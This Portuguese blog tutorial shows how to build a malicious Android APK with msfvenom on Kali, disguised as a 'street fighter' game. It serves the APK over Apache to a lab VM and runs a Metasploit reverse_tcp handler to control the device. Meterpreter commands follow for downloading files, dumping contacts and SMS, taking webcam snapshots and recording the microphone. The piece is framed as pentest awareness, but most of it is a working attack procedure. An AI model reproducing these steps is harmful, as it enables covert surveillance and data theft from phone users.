criando-payload-no-kali-linux-para-hackear-android

Criando Payload no Kali Linux para Hackear Android

Com o avanço  da tecnologia da informação e implementação de políticas de BYOD, existe um grande aumento do uso de smartphone na sociedade. E os hackers estão tentando obter informações sensíveis relacionadas com empresas ou seus empregados.
Um analista de segurança ou  Pentester, deve familiarizar-se com todos os exploits e payloads disponíveis no Kali Linux para realizar vários testes de vulnerabilidades nos dispositivos conectados a rede.

Objetivo

O objetivo desse artigo é ajudar a compreender a importância de não se instalar programas de fontes desconhecidas, bem como expor a possibilidade de exploração de dispositivos móveis.
Será criado um servidor e vamos testar um dispositivo conectado na rede, que são propensos a ataques. Realizar o ataque usando um simples apk (Android Package).

Cenário

Iremos utilizar uma máquina virtual com o Kali Linux e outra com o Android. Estou utilizando o VMware e as placas de rede como NAT. Nesse exemplo o IP do Kali é 192.168.173.238.

Kali Linux

O kali que será usado é 2016.2. Iremos agora:
  1. Criar o payload usando o msfvenom;
  2. Iniciar e acessar o metasploit;
  3. Criar um handler para aguardar a conexão reversa;

1. Criar o payload usando o msfvenom

O msfvenom  é a combinação do Msfpayload e Msfencode, colocados juntos nessa ferramenta em um único framework. O msfvenom substituiu tanto o msfpayload quanto o msfenconde desde 08 de junho de 2015.  As vantagens são:
  • Um única ferramenta;
  • As opções de linha de comando foram padronizadas;
  • Aumento na velocidade de execução.
Possui um grande número de opções:
captura-de-tela-2016-11-19-as-2-31-48-pm

Ok Agora vamos criar o malware, o  apk – aplicação android , que irá ser disponibilizada para o dispositivo android.
Digite o seguinte comando:
captura-de-tela-2016-11-19-as-2-40-17-pm

Iremos disponibilizar essa aplicação maliciosa via um servidor web. Precisamos copiar o apk para o diretório do servidor web apache. Vamos também alterar o nome do arquivo index.html para index.txt para o apache listar os arquivos na página principal e finalmente reiniciar o apache.
# cp street fighter.apk  /var/www/html
# cd /var/www/html/
# mv index.html  index.txt
# service apache2 restart

Iniciar e acessar o metasploit

Iniciar o postgresql
# service postgresql start
Acessar o metasploit, digite msfconsole e aperte Enter.


captura-de-tela-2016-11-19-as-3-00-24-pm

Quando você digita use exploit/multi/handler e aperta Enter você diz para tratar exploits lançados de fora do framework.
Agora digite os seguintes comandos no msfconsole:
  • Digite set payload android/meterpreter/reverse_tcp e aperte Enter.
  • Digite set LHOST 192.168.173.238 e aperte Enter.
  • Digite show options e aperte Enter. Este comando  irá exibir qual a porta será aberta.
captura-de-tela-2016-11-19-as-3-12-33-pm

Digite exploit -j -z e aperte Enter. Irá rodar o exploit em background.
captura-de-tela-2016-11-19-as-3-18-59-pm

Usando o Android

Você pode fazer o download da ISO em http://www.android-x86.org/download. A instalação é bem tranquila. Após a instalação ter sido feita ligar a VM e acessá-la. Abaixo segue tela inicial do Android Versão 4.3.

captura-de-tela-2016-11-19-as-4-21-31-pm

Clique no Menu e acesse o Browser. Vamos baixar uma imagem qualquer.

captura-de-tela-2016-11-19-as-4-25-24-pm

O próximo passo é baixar o apk malicioso disponível na máquina do Kali.
na url do browser digite: http://192.168.173.238
Baixe o apk. Ele irá para Downloads. Clique no menu principal vá até Downloads e clique no apk. Ele irá informar que você deve permitir a instalação de programas de fontes desconhecidas. Aceite e tente instalar novamente. Clique em abrir a aplicação. No kali você verá a conexão reversa sendo executada.

captura-de-tela-2016-11-19-as-4-35-13-pm

Digite sessions -l para listar as sessões abertas. Ele exibiu uma sessão com ID igual a 1 aberta.
captura-de-tela-2016-11-19-as-4-37-52-pm

Acessar essa sessão, digitando sessions -i 1. O -i é de interact, ou seja, interagir.
Pronto! Você está acessando o controlando o seu Android. Agora vamos brincar.
Digite ipconfig e verá informações de endereçamento.
Inserindo o comando sysinfo, irá exibir informações da máquina alvo, como o nome, sistema operacional e etc.
captura-de-tela-2016-11-19-as-6-00-11-pm
Como no Linux, digitando pwd irá exibir o diretório atual que você no sistema.
O diretório principal do Android é o /sdcard. Para mudar basta usar o comando cd.
meterpreter> cd /sdcard
meterpreter> pwd
Ele exibe que o diretório corrente é o /storage/emulated/legacy porque está emulando um armazenamento interno de um dispositivo móvel mesmo.
Pode-se criar agora um diretório chamado base, depois dê um ls:
captura-de-tela-2016-11-19-as-7-10-23-pm

A idéia é fazer um upload de um arquivo do Kali para o diretório base. Para fazer isso precisamos mudar para o diretório /sdcard/base. Outro detalhe importante é que ele só permite fazer upload de arquivos que estejam no diretório root do Kali.
Vou copiar o apk que está dentro de /var/www/html para o /root.
captura-de-tela-2016-11-19-as-7-36-38-pm
Agora fazer o upload do arquivo.
captura-de-tela-2016-11-19-as-7-31-59-pm

Para ver todos os arquivos localizados  no diretório Download, é necessário alterar para o diretório com o comando cd /sdcard/Download. Em seguida digitar ls para ver os arquivos lá dentro.
captura-de-tela-2016-11-19-as-7-44-17-pm

Bem podemos ver que tem alguns arquivos dentro do diretório. Para baixar basta digitar o comando download e o nome do arquivo completo.

captura-de-tela-2016-11-19-as-7-47-52-pm

Agora vá no Kali no diretório home folder par ver a imagem baixada.

captura-de-tela-2016-11-19-as-7-50-23-pm


captura-de-tela-2016-11-19-as-7-52-58-pm

Digite o comando help e verá as muitas opções desse exploit. Explore os comandos abaixo:
meterpreter> search -f *.mp3
meterpreter> dump_contacts
meterpreter> dump_sms
meterpreter> webcam_list
meterpreter> webcam_snap
meterpreter> webcam_snap -l 1
meterpreter> record_mic 5
meterpreter> webcam_stream -I 2

No próximo artigo vamos coletar credenciais usando uma ferramenta de engenharia social.

Até a próxima e que a força esteja com você.